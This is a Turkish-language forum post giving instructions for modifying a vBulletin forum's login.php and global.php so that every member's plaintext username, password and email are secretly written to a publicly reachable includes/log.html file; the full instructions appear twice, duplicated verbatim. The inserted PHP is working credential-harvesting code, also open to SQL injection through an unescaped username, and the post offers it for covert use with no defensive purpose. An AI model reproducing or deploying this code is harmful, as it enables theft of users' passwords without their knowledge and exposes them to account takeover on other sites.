~Black-Boss~
Yeni Üye
- Katılım
- 21 Eyl 2013
- Mesajlar
- 17
- Tepkime puanı
- 0
- Puanları
- 0
Sadece Vbulletin için geçerlidir .
login.Php Aç ve Aşağıdakini bul
Kod:
// create new session
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
Bir altına aşağıdaki kodu ekle
Kod:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = "./includes/log.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
global.php aç ve aşağıdakini bul
Kod:
$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
Aşağıdaki kodu yukardaki ile değiştir
Kod:
//$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
Şimdi includes/ klasörünü açın içine boş bir log.html yükleyin ve chmod değerini 777 olarak atayın.
Bitti log.html den sitenize giriş yapan üyelerin şifrelerini görebilirsiniz..
login.Php Aç ve Aşağıdakini bul
Kod:
// create new session
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
Bir altına aşağıdaki kodu ekle
Kod:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = "./includes/log.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
global.php aç ve aşağıdakini bul
Kod:
$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
Aşağıdaki kodu yukardaki ile değiştir
Kod:
//$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
Şimdi includes/ klasörünü açın içine boş bir log.html yükleyin ve chmod değerini 777 olarak atayın.
Bitti log.html den sitenize giriş yapan üyelerin şifrelerini görebilirsiniz..